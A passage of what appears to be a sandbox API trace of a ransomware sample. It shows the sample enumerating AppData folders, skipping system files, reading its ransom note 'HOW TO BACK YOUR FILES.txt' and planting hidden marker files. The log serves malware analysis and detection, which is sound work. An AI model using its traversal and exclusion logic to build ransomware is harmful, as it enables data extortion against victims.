dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0054.247] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.247] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.247] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.247] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.247] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x63cde605, ftCreationTime.dwHighDateTime=0x1d327ed, ftLastAccessTime.dwLowDateTime=0x63d07533, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0xe9a75134, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.247] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.247] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.247] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.247] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.247] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.247] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9a75134, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9a75134, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9a75134, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.247] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.247] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.247] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x63d07533, ftCreationTime.dwHighDateTime=0x1d327ed, ftLastAccessTime.dwLowDateTime=0x64e5777e, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0x64e5777e, ftLastWriteTime.dwHighDateTime=0x1d327ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0054.247] lstrcmpiW (lpString1="Services", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.247] lstrcmpiW (lpString1="Services", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.247] lstrcmpiW (lpString1="Services", lpString2="Rabbit4444.exe") returned 1 [0054.247] lstrcmpiW (lpString1="Services", lpString2=".") returned 1 [0054.247] lstrcmpiW (lpString1="Services", lpString2="..") returned 1 [0054.247] lstrcmpiW (lpString1="Services", lpString2="windows") returned -1 [0054.247] lstrcmpiW (lpString1="Services", lpString2="bootmgr") returned 1 [0054.247] lstrcmpiW (lpString1="Services", lpString2="pagefile.sys") returned 1 [0054.247] lstrcmpiW (lpString1="Services", lpString2="boot") returned 1 [0054.247] lstrcmpiW (lpString1="Services", lpString2="ids.txt") returned 1 [0054.247] lstrcmpiW (lpString1="Services", lpString2="NTUSER.DAT") returned 1 [0054.247] lstrcpyW (in: lpString1=0x130ebb2, lpString2="Services" | out: lpString1="Services") returned="Services" [0054.247] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0054.247] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x8c) returned 0x11f0f0 [0054.247] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf6370 [0054.248] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x63d07533, ftCreationTime.dwHighDateTime=0x1d327ed, ftLastAccessTime.dwLowDateTime=0x64e5777e, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0x64e5777e, ftLastWriteTime.dwHighDateTime=0x1d327ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 0 [0054.248] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0054.248] lstrcpyW (in: lpString1=0x130ebb2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.248] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\internet explorer\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.250] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.250] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.250] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.250] CloseHandle (hObject=0x278) returned 1 [0054.250] CloseHandle (hObject=0x27c) returned 1 [0054.250] GetCurrentThreadId () returned 0xd98 [0054.250] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6350 [0054.250] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services" [0054.250] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11f0f0 | out: hHeap=0xe0000) returned 1 [0054.250] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6348 | out: hHeap=0xe0000) returned 1 [0054.250] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services" [0054.250] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\" [0054.250] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\.BFC0E91B00AE8A0620D3" [0054.250] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\internet explorer\\services\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.252] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.254] FlushFileBuffers (hFile=0x27c) returned 1 [0054.255] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.255] CloseHandle (hObject=0x27c) returned 1 [0054.256] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services") returned 69 [0054.256] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.256] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x63d07533, ftCreationTime.dwHighDateTime=0x1d327ed, ftLastAccessTime.dwLowDateTime=0x64f482c3, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0xe9a9b339, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0054.256] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.256] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.256] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.256] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.256] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x63d07533, ftCreationTime.dwHighDateTime=0x1d327ed, ftLastAccessTime.dwLowDateTime=0x64f482c3, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0xe9a9b339, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.256] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.256] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.256] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.256] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.256] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.256] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9a9b339, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9a9b339, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9a9b339, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.256] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.256] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.256] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9a9b339, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9a9b339, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9a9b339, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0054.256] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0054.256] lstrcpyW (in: lpString1=0x130ebc4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.257] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\internet explorer\\services\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.269] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.269] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.269] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.269] CloseHandle (hObject=0x278) returned 1 [0054.269] CloseHandle (hObject=0x27c) returned 1 [0054.269] GetCurrentThreadId () returned 0xd98 [0054.269] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6370 [0054.269] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache" [0054.269] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10dee8 | out: hHeap=0xe0000) returned 1 [0054.269] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6368 | out: hHeap=0xe0000) returned 1 [0054.269] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache" [0054.269] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\" [0054.269] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\.BFC0E91B00AE8A0620D3" [0054.269] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.272] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.274] FlushFileBuffers (hFile=0x27c) returned 1 [0054.275] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.276] CloseHandle (hObject=0x27c) returned 1 [0054.276] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache") returned 59 [0054.276] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.276] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xdfedb1f6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd323af8f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe9ac157c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102810 [0054.276] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.276] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.276] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.276] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.276] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xdfedb1f6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd323af8f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe9ac157c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.276] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.276] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.276] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.277] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.277] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.277] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9ac157c, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9ac157c, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9ac157c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.277] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.277] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.277] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xdfedb1f6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xbac9c0cb, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0xbac9c0cb, ftLastWriteTime.dwHighDateTime=0x1d47c31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Content", cAlternateFileName="")) returned 1 [0054.277] lstrcmpiW (lpString1="Content", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.277] lstrcmpiW (lpString1="Content", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.277] lstrcmpiW (lpString1="Content", lpString2="Rabbit4444.exe") returned -1 [0054.277] lstrcmpiW (lpString1="Content", lpString2=".") returned 1 [0054.277] lstrcmpiW (lpString1="Content", lpString2="..") returned 1 [0054.277] lstrcmpiW (lpString1="Content", lpString2="windows") returned -1 [0054.277] lstrcmpiW (lpString1="Content", lpString2="bootmgr") returned 1 [0054.277] lstrcmpiW (lpString1="Content", lpString2="pagefile.sys") returned -1 [0054.277] lstrcmpiW (lpString1="Content", lpString2="boot") returned 1 [0054.277] lstrcmpiW (lpString1="Content", lpString2="ids.txt") returned -1 [0054.277] lstrcmpiW (lpString1="Content", lpString2="NTUSER.DAT") returned -1 [0054.277] lstrcpyW (in: lpString1=0x130ebb0, lpString2="Content" | out: lpString1="Content") returned="Content" [0054.277] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content", dwFileAttributes=0x2010) returned 1 [0054.277] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63a8 [0054.277] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x88) returned 0x1056a0 [0054.277] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf63b0 | out: ListHead=0xf68b0, ListEntry=0xf63b0) returned 0xf6670 [0054.277] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xdfedb1f6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xbac9c0cb, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0xbac9c0cb, ftLastWriteTime.dwHighDateTime=0x1d47c31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 1 [0054.277] lstrcmpiW (lpString1="MetaData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.277] lstrcmpiW (lpString1="MetaData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.277] lstrcmpiW (lpString1="MetaData", lpString2="Rabbit4444.exe") returned -1 [0054.277] lstrcmpiW (lpString1="MetaData", lpString2=".") returned 1 [0054.277] lstrcmpiW (lpString1="MetaData", lpString2="..") returned 1 [0054.278] lstrcmpiW (lpString1="MetaData", lpString2="windows") returned -1 [0054.278] lstrcmpiW (lpString1="MetaData", lpString2="bootmgr") returned 1 [0054.278] lstrcmpiW (lpString1="MetaData", lpString2="pagefile.sys") returned -1 [0054.278] lstrcmpiW (lpString1="MetaData", lpString2="boot") returned 1 [0054.278] lstrcmpiW (lpString1="MetaData", lpString2="ids.txt") returned 1 [0054.278] lstrcmpiW (lpString1="MetaData", lpString2="NTUSER.DAT") returned -1 [0054.278] lstrcpyW (in: lpString1=0x130ebb0, lpString2="MetaData" | out: lpString1="MetaData") returned="MetaData" [0054.278] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData", dwFileAttributes=0x2010) returned 1 [0054.278] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0054.278] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x8a) returned 0x11e8a0 [0054.278] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf63b0 [0054.278] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xdfedb1f6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xbac9c0cb, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0xbac9c0cb, ftLastWriteTime.dwHighDateTime=0x1d47c31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 0 [0054.278] FindClose (in: hFindFile=0x102810 | out: hFindFile=0x102810) returned 1 [0054.278] lstrcpyW (in: lpString1=0x130ebb0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.278] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.280] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.281] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.281] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.281] CloseHandle (hObject=0x278) returned 1 [0054.281] CloseHandle (hObject=0x27c) returned 1 [0054.281] GetCurrentThreadId () returned 0xd98 [0054.281] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6350 [0054.281] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData" [0054.281] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e8a0 | out: hHeap=0xe0000) returned 1 [0054.281] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6348 | out: hHeap=0xe0000) returned 1 [0054.281] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData" [0054.281] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\" [0054.281] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\.BFC0E91B00AE8A0620D3" [0054.281] CreateFileW 